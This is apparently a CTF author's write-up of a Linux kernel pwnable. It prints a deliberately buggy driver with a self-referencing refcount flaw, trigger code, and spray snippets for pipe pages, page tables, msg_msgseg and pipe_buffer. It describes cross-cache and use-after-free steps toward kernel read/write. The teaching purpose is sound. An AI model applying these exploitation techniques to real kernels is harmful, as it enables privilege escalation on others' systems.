Last month, Jacob asked me to create a CTF challenge for the Summer Pwnables event. I went with a kernel pwnable since my goal was to teach students some more advanced Linux kernel exploitation techniques - something that wouldn’t get solved in a day (and hopefully not by AI either).

After building both the challenge and the solution, I figured students should be able to crack it within 3-7 days. It turned out I was right about the timeline, though only one person solved it within that window: Jun Rong Lam was the first solver, cracking the challenge in a week. Lucas Tan Yi Je solved it the following week, and Elijah Chia solved it in the third week, so three solvers over three weeks in total. I am really amazed by these students' skill and persistence.

Before I explain the solution: you can get the challenge here, and if you want hints, see this and this.

Challenge #002: Walkthrough

Now let me introduce the challenge. Like most kernel pwnables, we give participants a vulnerable kernel driver.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h>

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
        u64 event_id;
        refcount_t causal_weight;
        struct temporal_event *causal_dependency;
        char description[64];
        struct list_head timeline_node;
        struct timeline *parent_timeline;
};

struct timeline {
        u64 timeline_id;
        atomic64_t next_event_id;
        struct list_head events_head;
        struct temporal_event *caused_by_event;
        struct list_head session_node;
};

struct paradox_session_data {
        struct mutex lock;
        struct list_head all_timelines;
        atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
        //      printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
        kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
        struct temporal_event *ev;
        if (!tl) return NULL;
        list_for_each_entry(ev, &tl->events_head, timeline_node) {
                if (ev->event_id == event_id) return ev;
        }
        return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
        u64 cause_timeline_id, cause_event_id;
        u64 new_timeline_id;
};
struct paradox_event_req {
        u64 target_timeline_id;
        u64 cause_event_id;
        char description[64];
        u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
        struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
        if (!session) return -ENOMEM;

        mutex_init(&session->lock);

        INIT_LIST_HEAD(&session->all_timelines);
        atomic64_set(&session->next_timeline_id, 0);

        struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
        if (!primordial_tl) { kfree(session); return -ENOMEM; }
        primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
        atomic64_set(&primordial_tl->next_event_id, 0);
        INIT_LIST_HEAD(&primordial_tl->events_head);
        list_add_tail(&primordial_tl->session_node, &session->all_timelines);

        struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
        if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
        first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
        refcount_set(&first_cause->causal_weight, 1);
        strcpy(first_cause->description, "The First Cause");
        first_cause->parent_timeline = primordial_tl;
        list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

        filp->private_data = session;
        //printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
        return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
        struct paradox_session_data *session = filp->private_data;
        struct timeline *tl, *tmp_tl;
        struct temporal_event *event, *tmp_event;
        //printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
        list_for_each_entry(tl, &session->all_timelines, session_node) {
                list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
                        struct temporal_event *cause = event->causal_dependency;
                        list_del(&event->timeline_node);
                        while (cause) {
                                struct temporal_event *next_in_chain = cause->causal_dependency;
                                event_put(cause);
                                cause = next_in_chain;
                        }
                        event->causal_dependency = NULL;
                        event_put(event);
                }
        }
        //printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
        list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
                list_del(&tl->session_node);
                if (tl->caused_by_event) event_put(tl->caused_by_event);
                kfree(tl);
        }
        kfree(session);
        return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
        struct paradox_session_data *session = filp->private_data;
        struct timeline *target_tl = NULL, *tmp_tl;
        long ret = 0;

        mutex_lock(&session->lock);

        switch (cmd) {
                case PARADOX_CREATE_TIMELINE:
                        {
                                struct paradox_timeline_req req;
                                if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
                                struct temporal_event *cause_event = NULL;
                                list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
                                        if(tmp_tl->timeline_id == req.cause_timeline_id) {
                                                cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
                                                if(cause_event) break;
                                        }
                                }
                                if (!cause_event) { ret = -EINVAL; break; }
                                struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
                                if (!new_tl) { ret = -ENOMEM; break; }
                                new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
                                atomic64_set(&new_tl->next_event_id, 0);
                                INIT_LIST_HEAD(&new_tl->events_head);
                                new_tl->caused_by_event = cause_event;
                                event_get(cause_event);
                                list_add_tail(&new_tl->session_node, &session->all_timelines);
                                req.new_timeline_id = new_tl->timeline_id;
                                if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
                                break;
                        }

                case PARADOX_CREATE_EVENT:
                        {
                                struct paradox_event_req req;
                                if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
                                list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
                                        if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
                                }
                                if (!target_tl) { ret = -EINVAL; break; }
                                struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
                                if (!event) { ret = -ENOMEM; break; }
                                event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
                                refcount_set(&event->causal_weight, 1);
                                strncpy(event->description, req.description, sizeof(event->description) - 1);
                                event->parent_timeline = target_tl;
                                list_add_tail(&event->timeline_node, &target_tl->events_head);
                                if (req.cause_event_id != 0) {
                                        struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
                                        if (cause_event) {
                                                event->causal_dependency = cause_event;
                                                event_get(cause_event);
                                        }
                                }
                                req.new_event_id = event->event_id;
                                if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
                                break;
                        }
                default:
                        ret = -EINVAL;
        }

        mutex_unlock(&session->lock);
        return ret;
}

static const struct file_operations fops = {
        .owner = THIS_MODULE,
        .open = paradox_engine_open,
        .release = paradox_engine_release,
        .unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
        dev.minor = MISC_DYNAMIC_MINOR;
        dev.name = DEVICE_NAME;
        dev.fops = &fops;
        dev.mode = 0644;
        temporal_event_cache = kmem_cache_create("temporal_event_cache",
                        sizeof(struct temporal_event),
                        0, SLAB_PANIC, NULL);
        if (!temporal_event_cache) {
                printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
                return -ENOMEM;
        }

        if (misc_register(&dev)) {
                return -1;
        }


        return 0;
}

static void dev_cleanup(void) {
        misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);

We register a kernel device that we can interact with by opening “/dev/paradox_engine”. There are two important data structures, timeline and temporal_event. When we open the kernel driver, it allocates a paradox_session_data and stores it in private_data. paradox_session_data holds all timelines in a linked list, and each timeline likewise holds all of its temporal_events in a linked list.

When we open the driver, paradox_engine_open runs and allocates the initial (first) timeline, and inside that first timeline it allocates the first event. There is also an ioctl interface we can interact with: we can create another timeline using PARADOX_CREATE_TIMELINE and another event using PARADOX_CREATE_EVENT.

The bug is not really hard to spot. In PARADOX_CREATE_EVENT we can specify which event caused the new one via cause_event_id, and the code searches the timeline's event linked list for that cause. The problem is that the event we are creating is inserted into the linked list first, so if cause_event_id matches the ID the newly inserted event just received, the event becomes its own cause and we get an infinite dependency loop.

list_add_tail(&event->timeline_node, &target_tl->events_head); // [1]
if (req.cause_event_id != 0) {
    struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id); // [2] the lookup runs after our new event was added to the list
    if (cause_event) {
        event->causal_dependency = cause_event;
        event_get(cause_event);
    }
}
req.new_event_id = event->event_id;

When we release the file, paradox_engine_release is called and it releases all of the session's timelines and all of their events. If we managed to trigger the bug, this code runs in an infinite loop, because causal_dependency points to the event itself.

struct temporal_event *cause = event->causal_dependency;
list_del(&event->timeline_node);
while (cause) {
    struct temporal_event *next_in_chain = cause->causal_dependency;
    event_put(cause);
    cause = next_in_chain;
}

event_put keeps decrementing the refcount until it hits zero and then frees the event with kfree, but the CPU stays stuck in the infinite loop. After the refcount reaches zero and the event is freed, further decrements never bring the refcount back to 0 again; instead the refcount is saturated to 0xC0000000 (REFCOUNT_SATURATED), because from then on every decrement starts from a value at or below 1.

#define REFCOUNT_SATURATED	(INT_MIN / 2)
static inline void __refcount_dec(refcount_t *r, int *oldp)
{
	int old = atomic_fetch_sub_release(1, &r->refs);

	if (oldp)
		*oldp = old;

	if (unlikely(old <= 1))
		refcount_warn_saturate(r, REFCOUNT_DEC_LEAK);
}
void refcount_warn_saturate(refcount_t *r, enum refcount_saturation_type t)
{
	refcount_set(r, REFCOUNT_SATURATED);
    ...
}
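
Putting the pieces together, triggering the bug from userspace only takes one ioctl and a close(). Here is a minimal trigger sketch, assuming the primordial timeline has ID 0 and the new event will receive ID 1 (both counters start at 0); note that close() never returns because the closing thread gets stuck in the kernel loop, so a real exploit does this from a dedicated thread:

#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

struct paradox_event_req {
        uint64_t target_timeline_id;
        uint64_t cause_event_id;
        char description[64];
        uint64_t new_event_id;
};

#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

int main(void)
{
        int fd = open("/dev/paradox_engine", O_RDONLY);
        struct paradox_event_req req = {
                .target_timeline_id = 0,   /* primordial timeline */
                .cause_event_id     = 1,   /* the ID the new event itself will get */
        };
        strcpy(req.description, "paradox");
        /* the new event (ID 1) is linked into the list before the cause lookup,
         * so it ends up as its own causal_dependency */
        ioctl(fd, PARADOX_CREATE_EVENT, &req);
        close(fd);   /* release handler now spins forever on the self-dependency */
        return 0;
}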

Author Solution

Participants will notice that the object is allocated from its own dedicated SLUB cache (temporal_event_cache), so we need a cross-cache attack. There are plenty of resources on how to do this: basically, we just need to make a slab page return to the buddy allocator and then reclaim that page with another object by spraying. You can read more about cross-cache in this talk or here. For kernel exploitation techniques in general, there are tons of resources you can learn from in Google's KernelCTF repo.

In this challenge there is one more constraint on the cross-cache: the slab page must return to our CPU's per-cpu page (pcp) free list, not the free list of the CPU that is stuck in the infinite loop. It is impossible to reclaim the page if it ends up on the stuck CPU's pcp freelist.

What I did for the cross-cache is hold one event allocated just before and one just after the victim event. After the infinite loop starts on CPU0, my other thread on CPU1 releases those surrounding events so the whole slab page enters CPU1's pcp free list. These are roughly the steps (a CPU-pinning helper sketch follows the list):

  1. allocate N events (our victim event is among them)
  2. say the victim is the M-th of those N allocated events
  3. allocate 0x400 more events (outside the set of N)
  4. free 0x100 of them, every odd one, on CPU0 (to fill its cpu partial list)
  5. free 0x100 of them, every odd one, on CPU1 (to fill its cpu partial list)
  6. on CPU1: free all N events except the (M-1)-th, M-th, and (M+1)-th
  7. on CPU0: trigger the bug using the M-th event; the M-th event gets freed
  8. on CPU1: free the (M-1)-th and (M+1)-th events; their slab page becomes empty and is put on CPU1's pcp freelist
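
A small helper I find handy for this kind of per-CPU choreography is pinning each thread to its CPU with sched_setaffinity. This is just an illustrative sketch, not part of the challenge or the exploit code:

#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to a single CPU; returns 0 on success. */
static int pin_to_cpu(int cpu)
{
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(cpu, &set);
        return sched_setaffinity(0, sizeof(set), &set);  /* 0 = current thread */
}

/* Usage: the trigger thread calls pin_to_cpu(0) before close(fd) so the
 * infinite loop eats CPU0, while the reclaim thread calls pin_to_cpu(1)
 * before freeing the surrounding events and spraying. */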

After we successfully reclaim, we can null out causal_dependency so the infinite loop is released.

Participants will also notice that temporal_event is 0x70 bytes, and after a cross-cache to another object it is hard to find a target object with the same alignment. This is what makes the challenge harder, but it should still be solvable with common, known techniques.

Intended solution #01

After creating the challenge, I quickly crafted a solution. Instead of a common trick that might take more time to build, I used one trick that turns the double free into a page use-after-free without caring about chunk or address alignment. This is also what Hint #2 was about:

Hint #2: 🤫 Here’s a fun thought experiment: What happens when you take a peek at kfree and then… oops… “accidentally” free some non-slab memory? Might just be the plot twist your non-aligned kfree issue has been waiting for!

It turns out that if you kfree a memory area that is not managed by SLUB, it will simply free its page:

/**
 * kfree - free previously allocated memory
 * @object: pointer returned by kmalloc() or kmem_cache_alloc()
 *
 * If @object is NULL, no operation is performed.
 */
void kfree(const void *object)
{
	struct folio *folio;
	struct slab *slab;
	struct kmem_cache *s;
	void *x = (void *)object;

	trace_kfree(_RET_IP_, object);

	if (unlikely(ZERO_OR_NULL_PTR(object)))
		return;

	folio = virt_to_folio(object);
	if (unlikely(!folio_test_slab(folio))) {
		free_large_kmalloc(folio, (void *)object);
		return;
	}

	slab = folio_slab(folio);
	s = slab->slab_cache;
	slab_free(s, slab, x, _RET_IP_);
}
EXPORT_SYMBOL(kfree);

static void free_large_kmalloc(struct folio *folio, void *object)
{
	unsigned int order = folio_order(folio);

	if (WARN_ON_ONCE(order == 0))
		pr_warn_once("object pointer: 0x%p\n", object);

	kmemleak_free(object);
	kasan_kfree_large(object);
	kmsan_kfree_large(object);

	lruvec_stat_mod_folio(folio, NR_SLAB_UNRECLAIMABLE_B,
			      -(PAGE_SIZE << order));
	folio_put(folio);
}

Without caring about alignment or the exact address: if the address is not backed by a slab, kfree passes the page's folio to free_large_kmalloc, which releases the page by calling folio_put.

So my plan is to spray page-backed pipes (the backing pages are order 0), craft the fake event so that its refcount is 1, and let event_put run once more, which kfrees our pipe page. The pipe page (not the same thing as pipe_buffer) is also a known kernel exploitation target; you can read this or this, or take a look at the code here.
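
For the spray itself, each pipe that we fill with data receives an order-0 backing page from the buddy allocator, which is exactly what the freed slab page can come back as. A rough sketch; the pipe count is an arbitrary assumption, and in the real exploit the buffer would contain the crafted fake event (refcount = 1 at the victim's offset) rather than zeros:

#include <unistd.h>

#define NR_PIPES 256

static int pipes[NR_PIPES][2];

/* Give every pipe one freshly allocated order-0 backing page. */
static void spray_pipe_pages(void)
{
        char page_buf[4096] = { 0 };
        for (int i = 0; i < NR_PIPES; i++) {
                pipe(pipes[i]);
                write(pipes[i][1], page_buf, sizeof(page_buf));
        }
}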

So we have the pipe page freed through the kfree -> page free primitive, but it is still held by the pipe fd. Next, as a quick approach, I simply reclaim the freed pipe page with a page table. We can still write to that page table by writing into the pipe, and with that we have physical read/write anywhere.
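
To reclaim the freed pipe page with a page table, one common approach is to mmap many disjoint 2 MiB-aligned regions and touch one byte in each, so the kernel allocates a fresh PTE page per region. The base address and count below are arbitrary assumptions for illustration:

#include <stdint.h>
#include <sys/mman.h>

#define NR_PTE_SPRAY 512
#define REGION_SIZE  (2UL << 20)   /* one PTE table maps 2 MiB */

/* Each touched region forces allocation of one page-table (PTE) page,
 * which can land on the pipe page we just freed. */
static void spray_page_tables(void)
{
        for (uint64_t i = 0; i < NR_PTE_SPRAY; i++) {
                void *addr = (void *)(0x1337000000UL + i * REGION_SIZE);
                mmap(addr, REGION_SIZE, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
                *(volatile char *)addr = 1;   /* populate the PTE page */
        }
}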

Intended solution #02

Almost a week had passed; we had already released Hints #1 and #2 on the third day and were thinking about whether to publish another one. I was starting to suspect my first intended solution might be too uncommon (or the challenge too hard). It turned out Jun Rong solved the challenge before we posted the third hint, right within the timeline I had expected.

Although the way the victim chunk lands on a 0x70-aligned address makes it look hard to solve, I was confident enough that it should be possible with more common techniques such as msg_msg or pipe_buffer. Or might it not be solvable with common techniques at all?

So I quickly verified this by building a solution based only on msg_msg and pipe_buffer, and it works (it is only around 50% reliable, but that is still good).

The idea is to just keep trying until our victim event shares its alignment with an object slot of the target kmalloc cache. For example, if we are lucky, the victim can line up with a kmalloc-128, 192, or 256 slot. You can calculate it yourself: the victim sits at a multiple of 0x70 within its page while, say, kmalloc-192 slots start at multiples of 0xC0, and those offsets only coincide a few times per page, so roughly 10% of placements line up. On top of that, I had another idea that lets the attempt run multiple times until the alignment is correct without crashing the kernel, which brings the reliability of this solution to around 50%.

Let's look again at how the code releases all events:

        list_for_each_entry(tl, &session->all_timelines, session_node) {
                list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
                        struct temporal_event *cause = event->causal_dependency;
                        list_del(&event->timeline_node);
                        while (cause) {
                                struct temporal_event *next_in_chain = cause->causal_dependency;
                                event_put(cause);
                                cause = next_in_chain;
                        }
                        event->causal_dependency = NULL;
                        event_put(event);
                }
        }

These are roughly the steps of the idea (a msg_msgseg spray sketch follows the list):

  1. insert the first event, caused_by itself (the victim event)
  2. insert the second event, caused_by itself (make sure it lands on a different slab page than the first event)
  3. insert the third event, caused_by the first event
  4. close the fd; freeing the first event enters the infinite loop
  5. reclaim with msg_msgseg (say kmalloc-192); we don't need to craft anything, just fill the content with zeros
  6. the first infinite loop breaks
  7. another infinite loop, from the second event, is now running
  8. on another CPU, observe the msg_msgseg that successfully replaced the victim event; its content should be non-zero at some offset (because refcount_dec keeps modifying it)
  9. that tells me the offset of the refcount, so I know whether the victim object shares its location with a msg_msgseg slot or not
  10. if it does not, release the second infinite loop (again by reclaiming the second event with zeros)
  11. the third event is then released; although it puts its cause (which is the victim event), nothing happens (event_put is harmless when the refcount is not 1)
  12. go back to the beginning (run again)
  13. if it does line up, replace our msg_msgseg (free and allocate it again) with a crafted temporal_event that has refcount = 1
  14. release the second event's infinite loop
  15. the third event is then released; its causal_dependency still points to the victim event, which now has refcount = 1, so it kfrees the victim event, which is actually still held by our msg_msg
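
For step 5, the msg_msgseg spray can be done with System V message queues. On a typical x86_64 config the first 4048 bytes of the message live inside the msg_msg object itself and anything beyond spills into a msg_msgseg, so roughly 176 extra bytes should put the segment in kmalloc-192; these sizes are assumptions, adjust them for your target kernel. A rough sketch:

#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SEG_PAYLOAD (4048 + 176)   /* msg_msg data + a kmalloc-192 msg_msgseg */

struct spray_msg {
        long mtype;
        char mtext[SEG_PAYLOAD];
};

/* Queue `count` zero-filled messages; each one allocates a kmalloc-192
 * msg_msgseg whose zeroed content breaks the self-dependency loop if it
 * reclaims the victim event. */
static void spray_msgseg(int count, int *qids)
{
        static struct spray_msg msg;

        msg.mtype = 1;
        memset(msg.mtext, 0, sizeof(msg.mtext));
        for (int i = 0; i < count; i++) {
                /* one queue per message: the default per-queue byte limit
                 * only fits a few messages of this size */
                qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
                msgsnd(qids[i], &msg, sizeof(msg.mtext), IPC_NOWAIT);
        }
}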

After these steps, we have a use-after-free on a msg_msgseg. It looks quite complicated, but given creativity plus time, participants should be able to find a similar idea. A UAF on msg_msgseg means a UAF in a generic kmalloc cache. In my case I pivoted the msg_msgseg UAF into a UAF on the famous pipe_buffer, which lives in the same cache as the msg_msgseg; from there you can get kernel arbitrary read/write, or directly overwrite a kernel function pointer and do ROP.
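
For the pivot, the pipe_buffer array can be sized into kmalloc-192 as well: on typical x86_64 builds struct pipe_buffer is 40 bytes, so shrinking the ring to 4 slots with F_SETPIPE_SZ gives a 160-byte array in the same cache as the msg_msgseg (the sizes here are assumptions). A rough sketch:

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

/* Allocate pipe_buffer arrays in kmalloc-192: 4 slots * 40 bytes = 160. */
static void spray_pipe_buffers(int (*pfds)[2], int count)
{
        for (int i = 0; i < count; i++) {
                pipe(pfds[i]);
                fcntl(pfds[i][1], F_SETPIPE_SZ, 4 * 4096);   /* 4-slot ring */
                write(pfds[i][1], "A", 1);   /* buf[0] now holds live page/ops pointers */
        }
}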

As a side note, this solution is still only about 50% reliable, because sometimes event->causal_dependency ends up stored at the same offset as a freelist pointer when we reclaim with another object: when a new slab page is allocated, the freelist values are reinitialized across the page, so the kernel can crash when it dereferences event->causal_dependency.

Closing words

Although I realize I made a much harder challenge than most students could imagine or handle, I am glad three students managed to solve it with creativity and persistence. All three of them solved it in ways different from the intended solutions, which is very normal for kernel CTF challenges. One of them used the refcount_dec primitive to edit page tables, another used a partial overwrite to pivot the page use-after-free to a higher order; it is really cool to see their creativity. This is exactly what we need when we face hard exploitation problems, in CTFs and in the real world.

Writeups by students

References

  1. https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
  2. https://kaligulaarmblessed.github.io/post/cross-cache-for-lazy-people/
  3. https://hoefler.dev/articles/vsock.html
  4. https://www.interruptlabs.co.uk/articles/pipe-buffer
  5. https://elixir.bootlin.com/linux/v6.12.46/source/fs/pipe.c#L513